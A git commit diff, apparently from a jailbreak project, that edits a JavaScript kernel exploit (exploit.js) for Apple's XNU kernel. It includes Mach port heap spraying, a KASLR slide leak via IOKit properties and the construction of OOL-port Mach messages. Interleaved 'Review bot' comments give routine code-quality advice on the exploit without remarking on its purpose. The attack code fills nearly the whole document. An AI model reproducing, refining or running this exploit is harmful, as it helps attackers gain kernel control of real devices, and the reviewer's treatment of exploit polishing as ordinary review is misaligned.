From b040db45dfc9ef9a902e48bc2718a94cd099f505 Mon Sep 17 00:00:00 2001
From: spv420
Date: Tue, 31 May 2022 19:51:14 -0400
Subject: I live in a constant state of fear and misery Do you miss me anymore? And I don't even notice When it hurts anymore Anymore Anymore Anymore
---
 src/js/kexp/exploit.js | 92 ++++++++++++++++++--------------------------------
 1 file changed, 32 insertions(+), 60 deletions(-)
(limited to 'src/js/kexp')
diff --git a/src/js/kexp/exploit.js b/src/js/kexp/exploit.js
index 544a876..c667dd2 100755
--- a/src/js/kexp/exploit.js
+++ b/src/js/kexp/exploit.js
@@ -105,24 +105,28 @@ function copyinPort(kport, cnt) { var data = malloc(4); var master = malloc(4); fakeportData = malloc(4); + var host_self = mach_host_self(); host_get_io_master(mach_host_self(), master); ret = spray_data(NULL, 0, 5, data); printf("sprayed, still here\n"); printf("spray_data=%d (%s)\n", ret, mach_error_string(ret)); printf("sprayed, still here\n"); +// printf("%x %x\n", master, read_u32(master)); service = IOServiceGetMatchingService(read_u32(master), IOServiceMatching("AppleMobileFileIntegrity")); printf("service=%x\n", service); var tst = sptr("AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"); + printf("%x\n", tst); var kpbuf = tst + 4; for (var i = 0; i < cnt; i++) { write_buf(kpbuf + (i * kport_size), read_buf(kport + (i * kport_size), kport_size), kport_size); } var err = malloc(4); - var xml = sptr("AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA1768515945"); - ret = io_service_open_extended(service, self, 0, 0, 1, xml, strlen(xml) + 1, err, client); + var xmls = "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA1768515945"; + var xml = sptr(xmls); + ret = io_service_open_extended(service, self, 0, 0, 1, xml, xmls.length + 1, err, client); printf("io_service_open_extended=%d (%s)\n", ret, mach_error_string(ret)); if (ret == KERN_SUCCESS) { ret = read_u32(err); 
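Review bot: `host_self` is declared on the new side but the very next line still calls `mach_host_self()` a second time, so the new variable is dead; the intent was presumably `host_get_io_master(host_self, master);`. The added `// printf("%x %x\n", master, read_u32(master));` is commented-out debugging and should be deleted rather than committed. Switching the length argument to `xmls.length + 1` is fine, but the same `strlen(tst) + 1` pattern survives for `tst` further down in copyinPort, so the two call sites now compute lengths two different ways. copyinPort starts before and continues after this hunk.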
@@ -132,7 +136,6 @@ function copyinPort(kport, cnt) { var found = false; var o = IOIteratorNext(read_u32(it)); - printf("%x\n", o); while (o != MACH_PORT_NULL && !found) { var buf = malloc(16 * 4); @@ -141,13 +144,8 @@ function copyinPort(kport, cnt) { ret = IORegistryEntryGetProperty(o, "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA", buf, size); printf("%d %s\n", ret, mach_error_string(ret)); if (ret == KERN_SUCCESS) { - printf("yolo\n"); -// mach_port_deallocate(self, read_u32(data)); -// write_u32(data, MACH_PORT_NULL); spray_data(tst, strlen(tst) + 1, 10, fakeportData); - printf("still still alive?\n"); kslide = (((read_u32(buf + (9 << 2)) & 0xFFF00000) + 0x1000) -0x80001000) >>> 0; - printf("still alive? %x\n", 420); printf("YOLO YOLO YOLO kaslr_slide=%s\n", kslide.toString(16)); found = true; return ((read_u32(buf + (4 << 2)) - 0x78)) >>> 0; @@ -202,7 +200,10 @@ function spray_ports(number_port_descs) { mach_port_allocate(task_self, MACH_PORT_RIGHT_RECEIVE, mp); mach_port_insert_right(task_self, read_u32(mp), read_u32(mp), MACH_MSG_TYPE_MAKE_SEND); - send_ports(read_u32(mp), read_u32(kp), 2, number_port_descs); + var ret_ = send_ports(read_u32(mp), read_u32(kp), 2, number_port_descs); + +// printf("%d (%s)\n", ret_, mach_error_string(ret_)); + var ret = read_u32(mp); free(mp); return ret; 
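Review bot: In the spray_ports hunk, `ret_` captures the result of `send_ports(...)` but its only consumer is the commented-out printf beneath it, so the new assignment is dead code. Either act on it — `if (ret_ != KERN_SUCCESS) printf("%d (%s)\n", ret_, mach_error_string(ret_));`, the same shape release_port_ptrs gains later in this patch — or drop both the binding and the commented line. The `ret_`/`ret` pair is also easy to misread, since `ret` holds a port name and `ret_` a kern_return_t; a name such as `send_ret` would keep them apart. spray_ports starts before and continues after this hunk.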
@@ -236,75 +237,46 @@ function send_ports(target, payload, num, number_port_descs) { write_u32(init_port_set + (i << 2), payload); } - var buf = malloc(0x1c + (number_port_descs * 0xc * 8)); + // var buf = malloc(0x1c + (number_port_descs * 0xc * 8)); - write_u32(buf + req_msgh_body_msgh_descriptor_count, number_port_descs); +// write_u32(buf + req_msgh_body_msgh_descriptor_count, number_port_descs); - var new_buf = new Uint32Array(3); -// var tmp = u32_to_u8x4(init_port_set); - new_buf[0] = (init_port_set); - new_buf[1] = (num); - new_buf[2] = ((19 << 24) + (MACH_MSG_OOL_PORTS_DESCRIPTOR << 16)); - -// new_buf_.push(tmp[0]); -// new_buf_.push(tmp[1]); -// new_buf_.push(tmp[2]); -// new_buf_.push(tmp[3]); -// tmp = u32_to_u8x4(num); -// new_buf_.push(tmp[0]); -// new_buf_.push(tmp[1]); -// new_buf_.push(tmp[2]); -// new_buf_.push(tmp[3]); -// new_buf_.push(0); -// new_buf_.push(0); -// new_buf_.push(MACH_MSG_OOL_PORTS_DESCRIPTOR); -// new_buf_.push(19); - -// printf("%x 0x%08x,0x%08x,0x%08x,0x%08x,0x%08x,0x%08x,0x%08x,0x%08x,0x%08x,0x%08x,0x%08x,0x%08x,0x%08x,0x%08x,0x%08x,0x%08x,\n", new_buf_.length, new_buf_[zz]]); - -// var new_buf = fast_array_mul(new_buf_, number_port_descs); +// var buf = new Uint32Array((0x1c + (3 * number_port_descs)) / 4); - for (var i = 0; i < number_port_descs; i++) { - write_u32_buf(buf + req_init_port_set + (i * 0xc), new_buf, new_buf.length * 4); - } + large_buf[req_msgh_body_msgh_descriptor_count / 4] = number_port_descs; - /* - for (var i = 0; i < number_port_descs; i++) { - write_u32(buf + (req_init_port_set * (i + 1)) + req_init_port_set_address, init_port_set); - write_u32(buf + (req_init_port_set * (i + 1)) + req_init_port_set_count, num); - write_u8(buf + (req_init_port_set * (i + 1)) + 0x8, 0); - write_u8(buf + (req_init_port_set * (i + 1)) + 0xa, 19); - write_u8(buf + (req_init_port_set * (i + 1)) + 0xb, MACH_MSG_OOL_PORTS_DESCRIPTOR); - }*/ + var tmp = ((19 << 16) + (MACH_MSG_OOL_PORTS_DESCRIPTOR << 24)); - write_u32(buf + 
req_head_msgh_bits, 0x80001513); // MACH_MSGH_BITS_COMPLEX | MACH_MSGH_BITS(19, MACH_MSG_TYPE_MAKE_SEND_ONCE) - write_u32(buf + req_head_msgh_request_port, target); - write_u32(buf + req_head_msgh_reply_port, 0); - write_u32(buf + req_head_msgh_id, 1337); + for (var i = 0; i < number_port_descs; i++) { + var tmp2 = (i * 3) + (req_init_port_set >>> 2); + large_buf[tmp2 + 0] = (init_port_set); + large_buf[tmp2 + 1] = (num); + large_buf[tmp2 + 2] = tmp; + } - var ret = mach_msg(buf, 1, 0x1c + (number_port_descs * 0xc), 0, 0, 0, MACH_PORT_NULL); + large_buf[req_head_msgh_bits >>> 2] = 0x80001513; // MACH_MSGH_BITS_COMPLEX | MACH_MSGH_BITS(19, MACH_MSG_TYPE_MAKE_SEND_ONCE) + large_buf[req_head_msgh_request_port >>> 2] = target; + large_buf[req_head_msgh_reply_port >>> 2] = 0; + large_buf[req_head_msgh_id >>> 2] = 1337; - free(buf); +// printf("%s\n", prim_hexdump(read_buf(large_buf_ptr, 0x100))); + + var ret = mach_msg(large_buf_ptr, 1, 0x1c + (number_port_descs * 0xc), 0, 0, 0, MACH_PORT_NULL); return ret; } function release_port_ptrs(port) { - printf("alive\n"); var req = malloc(0x1c + (5 * 0xc) + 0x8); for (var i = 0; i < (0x1c + (5 * 0xc) + 0x8); i += 4) { write_u32(req + i, 0x0); } printf("%s\n", hexdump(read_buf(req, 0x1c + (5 * 0xc) + 0x8), 8, 2, req, 8, "0")); - printf("alive\n"); var ret = mach_msg(req, MACH_RCV_MSG, 0, (0x1c + (5 * 0xc) + 0x8), port, MACH_MSG_TIMEOUT_NONE, MACH_PORT_NULL); - printf("alive\n"); - // if (ret != KERN_SUCCESS) { -// printf("mach_recv %d %s\n", ret, mach_error_string(ret)); - printf("alive\n"); - // } + if (ret != KERN_SUCCESS) { + printf("mach_recv %d %s\n", ret, mach_error_string(ret)); + } free(req); - printf("alive\n"); } function get_kernel_task() { @@ -335,7 +307,7 @@ function get_kernel_task() { var big_buf = malloc(MIG_MAX); var small_buf = malloc(MIG_MAX); - + var big_size = malloc(4); var small_size = malloc(4); -- cgit v1.2.3
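Review bot: The rewritten send_ports body keeps four commented-out lines (`// var buf = malloc(...)`, `// write_u32(buf + req_msgh_body_msgh_descriptor_count, ...)`, `// var buf = new Uint32Array(...)`, `// printf("%s\n", prim_hexdump(...))`) next to the code that replaced them; delete them so the active path is the only one a reader has to follow. `tmp` and `tmp2` say nothing about what they hold — `var desc_flags = ...` and `var desc_base = ...` would make the descriptor layout readable, and the packing deserves a comment, e.g. `// descriptor bytes 8..11 as one little-endian u32: [10] = disposition 19, [11] = MACH_MSG_OOL_PORTS_DESCRIPTOR`, since the old `(19 << 24)` form was the opposite byte order. `large_buf` and `large_buf_ptr` are defined outside this hunk, and unlike the per-call `malloc`/`free` they replace, nothing visible here checks that `0x1c + (number_port_descs * 0xc)` fits within that buffer or clears contents left by a previous call; any bound on number_port_descs would have to come from the caller. send_ports starts before this hunk.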